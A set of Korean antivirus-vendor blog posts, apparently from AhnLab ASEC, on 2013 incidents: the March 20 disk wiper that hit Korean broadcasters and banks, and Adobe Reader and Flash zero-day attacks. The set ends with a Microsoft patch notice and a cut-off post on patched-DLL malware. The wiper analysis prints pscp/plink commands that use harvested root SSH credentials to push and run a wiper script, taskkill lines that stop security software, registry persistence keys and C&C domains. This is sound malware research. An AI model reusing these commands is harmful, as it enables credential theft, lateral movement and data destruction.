마이크로소프트(Microsoft)에서 2013년 12월 한 달 동안 해당 업체에서 개발한 소프트웨어에서 발견된 보안 취약점들을 제거하기 위해 보안 패치를 2014년 1월 16일 배포하였다.


이번에 마이크로소프트에서 배포된 보안 패치들은 총 4건으로 다음과 같다.


Microsoft Security Bulletin MS14-001 - 중요

Microsoft Word 및 Office Web Apps의 취약점으로 인한 원격 코드 실행 문제점 (2916605)


Microsoft Security Bulletin MS14-002 - 중요

Windows 커널의 취약점으로 인한 권한 상승 문제점 (2914368)


Microsoft Security Bulletin MS14-003 - 중요

Windows 커널 모드 드라이버의 취약점으로 인한 권한 상승 문제점 (2913602)


Microsoft Security Bulletin MS14-004 - 중요

Microsoft Dynamics AX의 취약점으로 인한 서비스 거부 문제점 (2880826)


마이크로소프트의 보안 패치 설치는 인터넷 익스플로러(Internet Explorer) 사용자들의 경우 아래 웹 사이트를 통해 진행 할 수 있다. 


마이크로소프트 업데이트


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

3월 20일 14시경 주요 방송사 및 은행 전산망 장애가 발생하는 사고가 한국에서 발생하였으며, ASEC에서는 악성코드 감염 후 디스크 손상으로 부팅 불가로 인해 장애가 발생한 것으로 확인하였다.


현재 해당 악성코드는 운영체제에 따라 디스크를 손상시키는 기능이 포함되어 있으며, 상세한 디스크 손상 내용은 아래 분석 정보에 기술하였다.


해당 악성코드는 V3 엔진(엔진버전:  2013.03.20.06 이상)으로 업데이트 할 경우 검사 및 치료가 가능하며, 3월 20일 오후 6시경부터 제공 중인 전용백신으로도 검사 및 치료 할 수 있다.


[UPDATE - 2013/03/25]


현재까지 ASEC에서 분석한 이번 주요 방송사 및 은행 전산망 장애를 유발한 악성코드는 다음 이미지와 같이 A 케이스와 B 케이스로 나누어서 발생하였다.



우선 위 이미지 좌측 편의 A 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


우선 드로퍼인 File A는  %Temp% 폴더에 다음 파일들을 생성하게 된다.


1) File B : MBR 파괴 기능 수행

2) File C : UPX 압축 된 SSL 연결을 위한 PUTTY 툴

3) File D : UPX 압축된 SFTP 연결을 위한 PUTTY 툴

4) File E : UNIX 계열 시스템 DISK를 파괴하는 스크립트


File E 스크립트가 대상으로 하는 시스템은 AIX Unix, HP Unix, Solaris 및 Linux 이다.


AIX, HP, Solaris 3개 시스템에서는 DD 명령어로 디스크를 10MB 및 81MB 크기 만큼 0으로 덮어 쓰기 하며, Linux 시스템에서는 다음의 디렉토리를 삭제한다.


/kernel/ 

/usr/ 

/etc/ 

/home/


File A에 의해 생성된 File B가 실행이 되면, %Temp% 폴더에 ~v3.log 파일이 존재하는지 확인 하게 된다. 만약 해당 파일이 존재 하지 않다면 감염 된 시스템의 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하게 된다.



그리고 File A 외부에서 원격 접속을 시도하기 위해, 다음 경로의 환경 설정 파일인 confCons.xml가 존재하는지 확인 하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Local Settings\Application Data\Felix_Deimel\mRemote\confCons.xml


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Local\Felix_Deimel\mRemote\confCons.xml


만약 confCons.xml가 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출한다.


Username="root"

Protocol="SSH"

Password=

Hostname

Descr

Panel

Port

Password


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\File C -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\File D -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


SSH의 SCP의 PUTTY 버전인 pscp를 이용해서 File E 를 Batch(Disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 로 복사한다. 그리고, PUTTY의 command 버전인 plink 를 이용해 Batch(disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 에 실행권한을 주고, /tmp/cpus 를 실행한다. 


이와 함께 외부에서 원격 접속을 시도하기 위한 다른 방법으로 다음 경로의 환경 설정 파일이 존재하는 확인하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Application Data\VanDyke\Config\ Sessions\*.ini


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Roaming\VanDyke\Config\Sessions\*.ini


만약 환경 설정 파일이 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출하게 된다.


S:"Protocol Name"=SSH

S:"Username"=root

D:"Session Password Saved"=00000001

S:"Hostname"=

S:"Password"=

D:"[SSH2] Port"=


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\conime.exe -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\alg.exe -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하는 File B는 아래와 같은 파일 매핑 오브젝트(FileMapping Object)를 이용하여 동기화 한 후 하나의 프로세스 만이 실행되도록 한다.


JO840112-CRAS8468-11150923-PCI8273V



그리고  %SystemDirectory%\TEMP\~v3.log 이름의 파일이 존재하는지 확인 한 후, 만약 존재하지 않는다면 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하게 된다.


이와 함께 Taskkill 명령을 WinExeC API로 호출 하여 국내 보안 소프트웨어 프로세스를 종료 하게 된다.


Taskkill /F /IM pasvc.exe

Taskkill /F /IM clisvc.exe


File B는 감염 된 시스템의 윈도우(Windows) 버전에 따라 서로 다른 하드 디스크 파괴 스레드(Thread) 를 생성하게 된다.


1) Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 논리 드라이브를 "PRINCPES" 문자열로 덮어 쓰기


B:\부터 Z:\ 까지 모든 논리 드라이브 중에서 드라이브 타입(Drive Type)이 DRIVE_REMOVABLE이나 DRIVE_FIXED인 드라이브의 데이터를 "PRINCIPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 덮어 쓰게 되는 데이터는 약 5.3MB 간격으로 100KB 씩 덮어 쓰게 된다.


2) Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 모든 논리 드라이브의 데이터를 "PRINCPES" 문자열로 덮어 쓴 후 삭제


모든 논리 드라이브의 데이터를 "PRINCPES" 문자열을 반복하여 덮어 씀으로써 원본 파일 내용을 제거 한 뒤, 모든 파일을 DeleteFile API로 삭제하고 모든 디렉토리를 RemoveDirectoryA API로 삭제 한다. 그리고 D:\부터 차례대로 드라이브의 파일 시스템을 제거 한 뒤, 마지막으로 C:\에서 제거한다. 그러나, C:\의 %SystemDirectory%, %ProgramData%, %ProgramFiles% 세 경로의 파일은 제거 하지 않는다.





논리 드라이브 파괴를 시작하고 나서 5분 뒤 "Shutdown -r -t 0 "라는 커맨드 라인(Command Line)을 WinExec로 실행 하여 시스템을 재부팅 시키나, 하드 디스크가 파괴 중일 경우에는 시스템은 재부팅 되지 않는다.



추가적으로 확인된 최초 이미지 우측 편의 B 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


드로퍼(Dropper) 역할을 수행하는 File K가 실행이 되면 아래와 같이 국내 보안 소프트웨어의 프로세스들을 강제 종료하게 된다.


taskkill /F /IM vrfwsvc.exe

taskkill /F /IM vrptsvc.exe

taskkill /F /IM vrscan.exe

taskkill /F /IM hpcsvc.exe

taskkill /F /IM hsvcmod.exe

taskkill /F /IM vrfwsock.exe

taskkill /F /IM vrmonnt.exe

taskkill /F /IM vrrepair.exe

taskkill /F /IM vrmonsvc.exe


그리고 국내 보안 소프트웨어 관련 다음 파일들을 삭제를 시도하게 되며, 삭제된 파일들과 동일한 경로에 File FFile L을 생성하게 된다.

VrDown.exe 
VrPatch.exe
ptUpdate.exe
update.zip
vms1014.zip

생성된 File L은 디스크 파괴 기능을 수행하는 File F를 다운로드 하기 위한 환경 설정 파일이며, File F는 앞서 언급한 A 케이스의 File B와 동일한 기능을 수행하게 된다. 그러나, 아래와 같은 세가지 다른 차이점을 가지고 있다.


1) File F는 File B가 갖고 있는 ~V3.log 파일의 존재 여부를 통해 하드 디스크 파괴 여부를 결정하는 기능이 포함되어 있지 않다.


2) File B는 "PRINCPES" 문자열을 이용하여 덮어쓰기를 수행하게 되나, File F는 "HASTATI" 문자열을 이용하여 덮어쓰기를 수행하게 된다.


3) File B는 실행 즉시 특정 문자열을 이용해 덮어 쓰기를 수행하게 되는 반면에, File F는 2013년 03월 20일 14시 이후에 특정 문자열을 이용해 덮어 쓰기를 수행하게 된다.


[UPDATE - 2013/03/22]


ASEC에서는 이번 전산망 장애를 유발한 악성코드에 대한 새로운 변형과 함께 함께 앞서 언급한 두가지 감염 케이스들과 다른 형태를 추가적으로 발견하였다.


먼저 추가적으로 발견한 디스크 손상을 유발하는 악성코드 File G는 기존에 발견된 File BFile F 들과 기능상으로는 동일하지만 디스크 손상을 유발하기 위해 덮었는 문자열이 "PR!NCPES"으로만 변경되었다.



그리고 추가적으로 발견된 감염 케이스에 사용된 악성코드는 아래 이미지와 동일한 전체적인 구조를 가지고 동작하게 된다.



최초 File H는 File I와 File J 두 개의 파일을 윈도우 시스템 폴더(C:\Widnwos\system32)에 생성하고 File I 를 실행 시킨다. 실행된 File I는 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe 프로세스에 인젝션 하게 된다. 


인젝션이 성공적으로 이루어지게 될 경우 인젝션된 File J 힙(Heap)을 할당 받은 후 인코딩(Encoding) 되어 있는 자신의 코드를 디코딩(Decoding) 하여 힙을 생성하여 스레드(Thread로) 구동 한다. 이 때 구동되는 스레드가 디스크를 앞서 언급한 File G와 동일한 "PR!NCPES" 문자열로 디스크를 덮어쓰게 된다.


우선 File H는 생성한 File I를 시스템이 재부팅 할 때마다 자동 실행하기 위해서 윈도우 레지스트리(Registry)에 다음의 키에 값을 추가하게 된다.


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Shell = explorer.exe, File I


그리고 생성한 윈도우 시스템 폴더에 생성한 File I와 File J의 시간 정보를 Kernel32.dll이 가지고 있는 시간 정보와 동일 하게 성정한다.


File H악성코드가 구동 될 수 있는 환경을 마련 한 뒤에 CMD.exe를 이용하여 ShellExecuteA 함수를 호출하여 자신을 삭제하게 된다.


그리고 생성된 File I는 SeDebugPrivilege 권한을 이용하여 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe에 인젝션을 시도 하게 된다.


인젝션은 우선 정상 시스템인 Lsass.exe 프로세스를 찾은 후 File J의 파일명을 문자열로 메모리 할 당 이후, 해당 문자열을 인자로 하여 LoadLibraryW 함수를 시작 주소로 하여 CreateRemoteThread를 호출하는 기법을 이용하였다.


File J 인젝션에 성공하게 되면 XOR 0x55로 인코딩되어 있는 디스크 손상을 위한 코드를 디코딩 한 후에 할당 받은 메모리에 쓰게 된다.


그리고 GetLocalTime 함수를 이용하여 감염된 시스템의 현재 시간을 구한 후 3월 20일 15시가 되기 전까지 대기하게 된다.


이 후 3월 20일 15시 1분이 되면 디코딩 된 디스크 손상을 위해 Thread로 동작하며 전체적인 기능은 앞서 언급한 File G와 동일하나 아래 두 가지만 다르다.


1) 동기화에 사용되는 파일맴핑 오브젝트(FileMapping Object)를 GOLD0112-CRAS8468-PAGE0923-PCI8273W 사용


2) File G는 디스크 손상을 중단하는 파일명이 "~v3.log" 이었으나, File J은 "kb01.tmp"를 사용


현재까지 이번 전산망 장애 관련 악성코드들 모두 V3 제품 군에서 다음과 같이 진단한다.


Win-Trojan/Agent.24576.JPF (2013.03.20.06)

Win-Trojan/Agent.24576.JPG (2013.03.20.07)

Trojan/Win32.XwDoor (2013.03.20.07)

Dropper/Eraser.427520 (2013.03.20.07)

SH/Eraer (2013.03.20.07)

Dropper/Hijacker.153088 (2013.03.21.01)

Win-Trojan/Loader.49152 (2013.03.21.01)

Win-Trojan/Injector.46080.AX (2013.03.21.01)

Trojan/Win32.HDC (AhnLab, 2013.03.21.01) 


현재 ASEC에서는 추가적인 정보들을 지속적으로 수집중이며, 관련된 악성코드들의 상세한 분석 정보를 작성 중에 있다. 


분석정보가 작성되는데로 해당 정보는 수시로 업데이트 될 예정이다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

2월 18일 ASEC에서는 "어도비 리더 CVE-2013-0640 및 CVE-2013-0641 취약점 악용" 관련 정보를 공개하면서 해당 공격에는 2개의 제로 데이(0-Day, Zero Day) 취약점이 악용되었음을 공개하였다.


한국 시각으로 2월 21일 어도비에서는 해당 취약점들을 제거 할 수 있는 보안 패치를 배포한다는 것을 보안 권고문 "Security updates available for Adobe Reader and Acrobat"을 통해 공개하였다.


이번에 배포하는 보안 패치의 설치 대상이 되는 제품들은 다음과 같다.


윈도우(Windows)와 맥킨토시(Macintosh) 대상의 Adobe Reader XI (11.0.01와 이전 버전

윈도우(Windows)와 맥킨토시(Macintosh) 대상의 Adobe Reader X (10.1.5와 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh)와 리눅스(Linux) Adobe Reader 9.5.3와 이전 버전

윈도우(Windows)와 맥킨토시(Macintosh) 대상의 Adobe Acrobat XI (11.0.01와 이전 버전)

윈도우(Windows)와 맥킨토시(Macintosh) 대상의 Adobe Acrobat X (10.1.5와 이전 버전)

윈도우(Windows)와 맥킨토시(Macintosh) 대상의 Adobe Acrobat 9.5.3과 이전 버전


어도비에서 제공하는 보안 패치는 다음의 절차로 설치 할 수 있다.


1) 어도비 리더 실행 후 상단의 [도움말] -> [업데이트 확인]을 클릭한다



2) 아래 이미지와 같이 [업데이트 확인 중...]이라는 메시지 이후 자동으로 보안 패치가 다운로드 후 설치 된다.



그리고 윈도우와 맥킨토시 사용자들은 아래 어도비 웹 사이트를 통해서도 별도 업데이트가 가능하다.


Adobe Reader for Windows


Adobe Reader for Macintosh



저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by AhnLab_ASEC

어도비(Adobe)에서는 현지 시각으로 2월 13일 어도비 리더(Reader)와 아크로뱃(Acrobat)에 존재하는 취약점인 CVE-2013-0640 및 CVE-2013-0641를 악용한 타깃 공격(Targeted Attack)이 발생하였음을 보안 권고문 "Security Advisory for Adobe Reader and Acrobat"를 통해 밝혔다.


이 번에 발견된 2개의 어도비 리더와 아크로뱃 취약점은 기존에 알려지지 않은 제로 데이(Zero-Day, 0-Day) 취약점으로 현재까지 해당 취약점들을 제거할 수 있는 보안 패치가 제공되지 않고 있다.


ASEC에서 파악한 바로는 해당 제로 데이 취약점들은 아프가니스탄을 중심으로 한 중동 지역을 대상으로 한 타깃 공격(Targeted Attack) 형태로 이메일의 첨부 파일로 공격이 진행되었다.


어도비에서는 해당 취약점들에 영향을 받는 어도비 리더와 아크로뱃 버전들은 다음과 같음을 밝히고 있다.


윈도우(Windows) 및 맥킨토시(Macintosh) Adobe Reader XI (11.0.01 및 이전 버전)

윈도우(Windows) 및 맥킨토시(Macintosh) Adobe Reader X (10.1.5  및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh) 및 리눅스(Linux) Adobe Reader 9.5.3 및 이전 버전

윈도우(Windows), 맥킨토시(Macintosh) Adobe Acrobat XI (11.0.01 및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh)Adobe Acrobat X (10.1.5 및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh) Adobe Acrobat 9.5.3 및  9.x 버전


이 번에 발견된 해당 제로 데이 취약점들은 어도비 리더 및 아크로뱃에서 XML 처리를 위해 사용되는 "AcroForm.api" 모듈에서 발생하는 힙 스프레이 오버플로우(Heap-spray overflow) 취약점이다.


이 번 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점들은 이메일의 첨부 파일 형태로 "Visaform Turkey.pdf (828,744 바이트)"라는 파일명으로 공격에 사용되었다.


해당 제로 데이 취약점들을 악용하는 취약한 PDF 파일을 열게 되면 아래 이미지와 동일한 내용을 가지고 있다.



타깃 공격에 사용된 제로 데이 취약점을 악용한 PDF 파일은 아래 이미지와 동일한 구조를 가지고 있으며, 첫 번째 스트림(Stream)에는 D.T (3,644 바이트) 파일이 암호화 되어 있고, 두 번째 스트림에는 L2P.T (366,926 바이트) 파일이 암호화 되어 존재한다.


그리고 아래 이미지와 동일하게 b5h에서부터 해당 취약한 PDF 문서를 여는데 사용한 어도비 리더와 아크로뱃의 버전을 확인하는 코드가 포함되어 있다.



해당 어도비 리더와 아크로뱃의 버전을 확인하는 코드는 다음 버전을 사용 중인지 확인하게 된다.


10.0.1.434

10.1.0.534

10.1.2.45

10.1.3.23

10.1.4.38

10.1.4.38ARA

10.1.5.33

11.0.0.379

11.0.1.36

9.5.0.270

9.5.2.0

9.5.3.305


만약 해당 취약한 PDF를 열었는 어도비 리더 및 아크로뱃이 해당 버전들에 해당 되지 않을 경우에는 아래 오류 메시지를 발생 후 종료하게 된다.



그리고 해당 취약한 PDF 파일은 아래 이미지와 동일하게 6F932h에서부터 난독화된 자바스크립트(Javascript)가 존재한다.



이 번 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점들을 악용한 공격의 전체적인 구조는 다음 이미지와 동일하다.



해당 제로 데이 취약점을 악용하는 취약한 PDF 파일을 열게 되면, D.T (46,080 바이트)라는 파일명을 가지는 DLL 파일이 다음 경로에 생성된다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\acrord32_sbx\D.T


생성된 D.T (46,080 바이트)는 다시 L2P.T (453,632 바이트) 파일명을 가지는 DLL 파일을 다음 경로에 생성하게 된다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\acrord32_sbx\L2P.T


L2P.T (453,632 바이트)는 취약점이 존재하지 않은 정상 PDF 문서인 Visaform Turkey.pdf (77,210 바이트)를 생성하여 해당 취약한 PDF 파일을 열었던 PC 사용자들에게 정상 파일처럼 보이게 만든다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\Visaform Turkey.pdf


그리고 L2P.T (453,632 바이트)는 외부 네트워크 연결이 가능한지 다음 도메인으로 접속으로 시도한다.


www.google.com/param 


감염된 시스템이 32비트(Bit) 운영체제 또는 64비트(Bit) 운영체제인지를 확인한 후, 32비트 윈도우 운영체제 일 경우에는 LangBar32.dll (250,880 바이트)을 생성하고, 64비트 윈도우 운영체제 일 경우에는 LangBar64.dll (219,648 바이트)를 다음 경로에 생성하게 된다.


c:\documents and settings\[사용자 계정명]\local settings\application data\cache\LangBar32.dll 


C:\Users\[사용자 계졍명]\AppData\Local\cache\LangBar64.dll 


그리고 감염된 시스템이 재부팅하더라도 자동 실행을 위해 레지스트리에 다음과 같은 키 값을 생성하게 된다.


HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBarAddIn\{CLSID}

= C:\Documents and Settings\[사용자 계정]\Local Settings\Application Data\cache\LangBar32.dll


생성된 LangBar32.dll (250,880 바이트) 또는 LangBar64.dll (219,648 바이트)는 다음의 시스템으로 접속을 시도하게 된다.


bolsilloner.es/index.php


접속이 성공하게 될 경우에는 해당 시스템에서 특정 파일들을 다운로드 하여 lbarext32.dll (236,544 바이트)와 lbarhlp32.dll (269,824 바이트) 파일명의 DLL 파일들을 생성하게 된다.


생성된 해당 lbarext32.dll (236,544 바이트)와 lbarhlp32.dll (269,824 바이트)는 감염된 시스템에서 다음 정보들을 수집하여 kmt32.pod에 기록하게 된다.


실행 중인 프로세스 리스트

실행 중인 프로그램의 윈도우 명

사용자가 입력하는 키보드 입력 값


해당 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점을 악용한 공격은 악성코드 생성 및 악용한 취약점의 형태를 보았을 때 2월 7일 공개된 "어도비 플래쉬 플레이어 CVE-2013-0633 및 CVE-2013-0634 취약점 악용"과 동일한 그룹에 의해 제작되었을 것으로 추정된다.


이 번에 발견된 어도비 리더 및 아크로뱃에 존재하는 제로 데이 취약점을 악용한 악성코드들은 V3 제품 군에서 다음과 같이 진단한다.


PDF/Exploit

Win-Trojan/Itaduke.46080

Win-Trojan/Itaduke.453632

Win-Trojan/Itaduke.250880

Win64-Trojan/Itaduke.219648

Win-Trojan/Itaduke.236544 

Win-Trojan/Itaduke.269824


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/PDF.InScript_ZWF


어도비에서는 보안 패치를 배포하기 전까지 다음과 같은 임시 방안을 권고하고 있다. 아래 임시 방안은 윈도우(Windows) XP에 설치되어 있는 영문 어도비 리더를 기준으로 작성 되었다.


1) 어도비 리더 실행 후 상단의 [편집(Edit)] -> [기본 설정(Preferences)]을 클릭한다



2) [보안 고급(Security Enhanced)]를 클릭 후 상단의 [샌드 박스 보호(Sandbox Protections]에서 [제한된 보기(Protected View)]에서 [안전하지 않을 수 있는 위치의 파일(Files from potentially unsafe locations)]에 클릭한다.



앞서 언급한 바와 같이 현재 어도비에서는 해당 취약점들을 제거할 수 있는 보안 패치를 아직 배포하지 않고 있다. 현재 어도비에서는 보안팀 블로그 "Schedule update to Security Advisory for Adobe Reader and Acrobat (APSA13-02)"를 통해 현지 시각으로 2월 18일 보안 패치를 배포를 예정하고 있다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

어도비(Adobe)에서는 현지 시각으로 2월 7일 어도비 플래쉬 플레이어(Adobe Flash Player)에 존재하는 취약점인 CVE-2013-0633 및 CVE-2013-0634를 제거하기 위한 보안 패치를 배포 중임을 보안 권고문 "APSB13-04 Security updates available for Adobe Flash Player"를 통해 밝혔다.


이 번에 발견된 2개의 어도비 플래쉬 플레이어 취약점은 기존에 알려지지 않은 제로 데이(Zero-Day, 0-Day) 취약점이었다.


해당 제로 데이 취약점들은 특정 대상으로 상대로한 타깃 공격(Targeted Attack)과 웹 사이트를 통해 해당 취약점을 악용하는 플래쉬 파일(SWF)를 유포하는 것으로 공개되었다.


어도비에서는 해당 취약점들에 영향을 받는 플래쉬 플레이어 버전들은 다음과 같음을 밝히고 있다.


윈도우(Windows)와 맥킨토시(Macintosh) 설치 된 Adobe Flash Player 11.5.502.146 과 이전 버전

리눅스(Linux)에 설치된 Adobe Flash Player 11.2.202.261과 이전 버전 

안드로이드(Android) 4.x 에 설치된 Adobe Flash Player 11.1.115.36와 이전 버전

안드로이드(Android) 3.x와 2.x 에 설치된 Adobe Flash Player 11.1.111.31와 이전 버전


이 번 어도비 플래쉬 플레이어에 존재하였던 제로 데이 취약점은 마이크로소프트의 워드(Word)에 임베디드(Embedded) 된 형태로 타깃 공격이 발생하였다.


ASEC에서는 파악한 바로는 총 3개의 마이크로소프트 워드가 공격에 사용되었으며, 아래 이미지와 같은 내용들을 포함하고 있다.





타깃 공격에 사용된 마이크로소프트 워드 파일 중 2개의 워드 파일들은 다음과 같은 구조를 가지고 있으며, 컨텐츠(Contents) 섹션에 어도비 플래쉬 플레이어에 존재하는 취약점을 악용하는 취약한 플래쉬 파일(SWF) 파일과 백도어가 포함되어 있다.



그리고 나머지 한 개의 워드 파일은 다음과 같은 구조를 가지고 있으며, 해당 파일 역시 컨텐츠(Contents) 섹션에 어도비 플래쉬 플레이어에 존재하는 취약점을 악용하는 취약한 플래쉬 파일(SWF) 파일과 백도어가 포함되어 있다.



이 번에 발견된 어도비 플래쉬 플레이어에 존재하였던 제로 데이 취약점 CVE-2013-0633 및 CVE-2013-0634은 모두 스택 오버플로우(Stack Overflow)로 인한 공격자가 지정한 임의의 코드를 실행 할 수 있는 코드 실행 취약점이다.


해당 취약점을 악용하는 취약한 어도비 플래쉬 플레이어 파일은 다음과 같은 구조를 가지고 있으며,  "DefineBinayData" 섹션을 2개 가지고 있다.



해당 취약한 어도비 플래쉬 파일에 존재하는 2개의 "DefineBinayData섹션에는 각각 아래 이미지와 같이 32비트에서 실행 할 수 있는 PE 파일과 64비트에서 실행 할 수 있는 PE+ 파일이 존재한다.




그리고  아래 이미지와 같이 시스템에 설치되어 있는 플래쉬 플레이어 버전과 운영체제의 버전을 체크하는 코드가 포함되어 있으며, 해당 버전의 플래쉬 플레이어에서만 취약점이 동작하도록 제작되었다.




해당 취약한 플래쉬 플레이어 파일을 제작한 공격자는 취약한 버전의 플래쉬 플레이어가 설치되어 있는 윈도우 운영체제가 32비트 또는 64비트 인가에 따라 서로 다른 악성코드 감염을 목적으로 제작하였다.


타깃 공격에 사용되었던 마이크로소프트 워드 파일들을 취약한 버전의 어도비 플래쉬 플레이어가 설치된 시스템에서 열게 되면 2개의 워드 파일들은 다음 이미지와 같이 동작하게 된다.


그리고 나머지 1개의 워드 파일은 다음 이미지와 같이 동작하게 된다.



취약한 어도비 플래쉬 파일을 포함하고 있는 마이크로소프트 워드 파일을 열게 되면 다음의 경로에는 abc.cfg (247,296 바이트)을 생성하게 된다.


C:\Documents and Settings\[사용자 계정]\Local Settings\Temp\abc.cfg


생성된 abc.cfg (247,296 바이트)는 동일한 경로에 seccenter.xxx (88,016 바이트 또는 33,280 바이트)를 생성하게 된다. 


2개의 마이크로소프트 워드 문서에서는 seccenter.xxx (88,016 바이트)의 복사본을 아래 경로에 Googleupdate.exe (88,016 바이트)로 생성하게 된다. 


C:\Documents and Settings\[사용자 계정]\Application Data\Googleupdate.exe


그리고 나머지 1개의 워드 문서에서는 seccenter.xxx (33,280 바이트)의 복사본을 아래 경로에 svchost.exe (33,280 바이트)를 생성하게 된다. 


C:\Documents and Settings\[사용자 계정]\Application Data\svchost.exe


그러나 생성된 svchost.exe (33,280 바이트)은 암호가 설정되어 있는 압축 파일로 분석 당시에는 정상적인 동작을 하지 않았다.


생성된 Googleupdate.exe (88,016 바이트)는 동일한 경로에 config.sys (568 바이트)를 생성하게 되는데, 해당 파일은 XOR로 인코딩(Encoding) 되어 있는 데이터 파일이다. 


해당 데이터 파일을 디코딩(Decoding)하게 되면 아래 이미지와 같이 접속을 시도하는 C&C(Command and Control) 서버의 주소인 ieee.boeing-job.com(108.62.10.13) 를 포함하고 있다.  그러나 분석 당시에는 해당 C&C 서버에는 정상적인 접속이 이루어지지 않았다.



그리고 Googleupdate.exe (88,016 바이트)는 아래 이미지와 같이 한국 온라인 게임 업체의 유효기간이 만료된 비정상적인 디지털 서명 정보가 남아 있다.



Googleupdate.exe (88,016 바이트)가 정상적으로 동작하게 되면 레지스트리(Registry)에 다음 키를 생성하여 시스템이 재부팅하더라도 자동 실행 가능하도록 설정하게 된다.


HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Update = C:\Documents and Settings\[사용자 계정]\Application Data\Googleupdate.exe


 그리고 감염된 시스템에 다음과 같은 보안 소프트웨어의 프로세스가 실행 중인지 확인하여, 만약 존재하게 된다면 강제종료를 시도하게 된다.


avp.exe

qqpctray.exe

kxetray.exe

360tray.exe


이 번에 발견된 어도비 플래쉬 플레이어에 존재하였던 제로 데이 취약점 CVE-2013-0633 및 CVE-2013-0634를 악용하는 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


DOC/Cve-2013-0633 

DOC/Cve-2013-0634

SWF/Cve-2013-0634 

Win-Trojan/Infostealer.247296

Win-Trojan/Boda.241570 

Win-Trojan/Boda.3328

Win-Trojan/Boda.247296

Win-Trojan/Boda.246272


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/DOC.InScript_ZWF


향후 출시 예정인 V3 다음 버전에 포함된 ASD 2.0의 MDP 엔진에서도 시그니처 없이 다음과 같이 탐지가 가능하다.


Dropper/MDP.Exploit


현재 어도비에서는 해당 취약점들이 제거되어 있는 플래쉬 플레이어 버전을 배포 중에 있음으로 아래 웹 사이트를 통해 최신 버전의 플래쉬 플레이어를 설치하는 것이 중요하다.


Adobe Flash Player Download Center


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 그 동안 악성코드에 의해 정상 윈도우(Windows) 시스템 파일을 변조시켜 악의적인 기능을 수행하는 패치드(Patched) 형태의 악성코드에 대한 정보들을 공개하였다.


특히 다양한 온라인 게임의 사용자 정보들을 탈취하는 온라인 게임 관련 트로이목마(OnlineGameHack)에 의해 온라인 게임의 메인 실행 프로세스의 주소 공간에 악성코드인  DLL 파일을 안정적으로 실행시키기 위해 윈도우 시스템의 정상 DLL 파일들을 감염 시키는 형태가 자주 발견되고 있다.


이러한 형태의 악성코드들을 일반적으로 패치드(Patched) 형태의 악성코드라고 불리고 있으며, 현재까지 발견된 악성코드에 의해 사용되는 패치드 기법들을 다음과 같이 정리 할 수 있다.


